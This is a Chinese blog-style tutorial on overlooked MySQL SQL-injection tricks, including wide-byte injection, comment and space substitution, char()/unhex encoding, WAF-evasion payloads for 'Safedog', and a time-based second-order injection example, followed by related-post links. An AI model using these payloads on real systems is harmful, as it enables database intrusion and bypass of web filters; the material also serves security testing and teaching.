那些容易被忽略、容易被弄错的地方

sql注入时的技巧

=========================================================================

*	如果单引号被转义,在当前数据库采用GBK编码的前提下,可以考虑双字节注入。

*	注释符的正确用法

		“-- ”才是mysql中的注释,注意后面有个空格

		mysql> select  user()  from (select 1)x where  '1'='1';-- '

		+----------------+

		| user()         |

		+----------------+

		| root@localhost |

		+----------------+

		1 row in set (0.00 sec)

		“#”注释,后面接不接空格无所谓

		mysql> select  user()  from (select 1) x where  '1'='1';#'

		+----------------+

		| user()         |

		+----------------+

		| root@localhost |

		+----------------+

		1 row in set (0.00 sec)

*	用/**/替代空格

		mysql> select/**/1;

		+---+

		| 1 |

		+---+

		| 1 |

		+---+

		1 row in set (0.00 sec)

*	sql语句中字符串转义

	-	mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );

		+-------------------------------------------------------------------+

		| char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |

		+-------------------------------------------------------------------+

		|  /tmp/f_user.txt                                                  |

		+-------------------------------------------------------------------+

		1 row in set (0.00 sec)

	-	mysql>  select  concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		| concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		|  /tmp/f_user.txt                                                                                                                                                    |

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		1 row in set (0.00 sec)

		# utf-8

	-	mysql> select unhex('E6B8B8E5AEA2');

		+-----------------------+

		| unhex('E6B8B8E5AEA2') |

		+-----------------------+

		| 游客                  |

		+-----------------------+

		1 row in set (0.00 sec)

*	数字和字符的比较,类似php中的弱类型

	-	mysql> select '10asfasfdeasdfasdf'=10;

		+-------------------------+

		| '10asfasfdeasdfasdf'=10 |

		+-------------------------+

		|                       1 |

		+-------------------------+

	-	mysql> select '0esfsadf'=0;

		+--------------+

		| '0esfsadf'=0 |

		+--------------+

		|            1 |

		+--------------+

*	绕过安全狗

	**	正则绕过

		-	select 1/*!50000union/*!*//*!50000select/*!*/2;

				+---+

				| 1 |

				+---+

				| 1 |

				| 2 |

				+---+

		-	mysql> select/*/#\*/1;

				+---+

				| 1 |

				+---+

				| 1 |

				+---+

				1 row in set (0.00 sec)

*	多个单引号相连时,最外层两个孤独单引号配对闭合,中间的连续偶数个单引号中每两个一组换算成一个。

	-	mysql> select '123''';

			+------+

			| 123' |

			+------+

			| 123' |

			+------+

			1 row in set (0.00 sec)

	-	mysql> select '123''''';

			+-------+

			| 123'' |

			+-------+

			| 123'' |

			+-------+

	-	mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'

			Empty set (1.00 sec)

		此特点可以引发“二次注入”,比如,注册用户时输入昵称{nickname'},被转义为{nickname\'}但在插入到数据库后被还原,

		那么在需要将昵称作为查询条件的页面中就存在二次注入,另一个条件字段的值为{ or 0=sleep(1);#}即可触发。

  

sql注入时易被忽略的语法技巧以及二次注入的更多相关文章

  1. 【sql注入】简单实现二次注入

    [sql注入]简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 1 ...

  2. sql手工注入时的探测技巧汇总

    工具的灵活性肯定比不上人,在手工探测的基础上再去自定义工具,才是正道. sql注入时手工探测技巧 =================================================== ...

  3. sql SELECT时的with(nolock)选项说明

    I used to see my senior developers use WITH (NOLOCK) when querying in SQL Server and wonder why they ...

  4. 转:sql SELECT时的with(nolock)选项说明

    I used to see my senior developers use WITH (NOLOCK) when querying in SQL Server and wonder why they ...

  5. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.二次注入也是 ...

  6. Sql 注入详解:宽字节注入+二次注入

    sql注入漏洞 原理:由于开发者在编写操作数据库代码时,直接将外部可控参数拼接到sql 语句中,没有经过任何过滤就直接放入到数据库引擎中执行了. 攻击方式: (1) 权限较大时,直接写入webshel ...

  7. Python连接MySQL数据库执行sql语句时的参数问题

    由于工作需要,今天写了一个Python小脚本,其中需要连接MySQL数据库,在执行sql命令时需要传递参数,结果出问题了.在网上查了一下,发现有以下几种方式传递参数: 一.直接把sql查询语句完整写入 ...

  8. ASPNETCOREAPI 跨域处理 SQL 语句拼接 多条件分页查询 ASPNET CORE 核心 通过依赖注入(注入服务)

    ASPNETCOREAPI 跨域处理 AspNetCoreApi 跨域处理 如果咱们有处理过MV5 跨域问题这个问题也不大. (1)为什么会出现跨域问题:  浏览器安全限制了前端脚本跨站点的访问资源, ...

  9. sql查询时增加自动编号和分页

    查询时加序号 a:没有主键的情形: ,) as iid,* into #tmp from TableName Select * from #tmp Drop table #tmp b:有主键的情形: ...

随机推荐

  1. nandflash驱动程序编写

    NAND FLASH是一个存储芯片 那么: 这样的操作很合理"读地址A的数据,把数据B写到地址A" 问1. 原理图上NAND FLASH和S3C2440之间只有数据线, 怎么传输地 ...

  2. IIS将错误信息发送到浏览器

    本文版权归博客园和dige1993所有,访问作者博客:http://www.cnblogs.com/dige1993 最近又开始玩ASP了,调试的时候出现错误不清楚详细错误信息特别不方便,记得以前可以 ...

  3. 超像素经典算法SLIC的代码的深度优化和分析。

    现在这个社会发展的太快,到处都充斥着各种各样的资源,各种开源的平台,如github,codeproject,pudn等等,加上一些大型的官方的开源软件,基本上能找到各个类型的代码.很多初创业的老板可能 ...

  4. Programming Contest Problem Types

        Programming Contest Problem Types Hal Burch conducted an analysis over spring break of 1999 and ...

  5. git submodule初用

    git submodule主要是用于针对git项目中还存在git子模块的情况.在一般情况下,我们通过git clone 获取项目的时候会把项目中的所有信息都拿到.但是,如果相关中存在git子模块那么, ...

  6. 安装ArcGIS Engine 9.3

    本文仅用于学习交流,商业用途请支持正版!转载请注明:http://www.cnblogs.com/mxbs/p/6217003.html 准备: ArcGIS Engine 9.3.crack_for ...

  7. redis 学习笔记(6)-cluster集群搭建

    上次写redis的学习笔记还是2014年,一转眼已经快2年过去了,在段时间里,redis最大的变化之一就是cluster功能的正式发布,以前要搞redis集群,得借助一致性hash来自己搞shardi ...

  8. [LeetCode] Ones and Zeroes 一和零

    In the computer world, use restricted resource you have to generate maximum benefit is what we alway ...

  9. .NET WebAPI 实现图片上传(包括附带参数上传图片)

    博主的项目,客户端是APP,考虑到以后也可能会应用到微信端.网站等,图片上传方法就需要兼容多端,并且以目前的设计,不允许非登录用户上传图片,就得在上传时解决附带参数上传图片的问题. 先来看看后台方法( ...

  10. 如何用TypeScript开发微信小程序

    微信小程序来了!这个号称干掉传统app的玩意儿虽然目前处于内测阶段,不过目前在应用号的官方文档里已经放出了没有内测号也能使用的模拟器了. 工具和文档可以参考官方文档:https://mp.weixin ...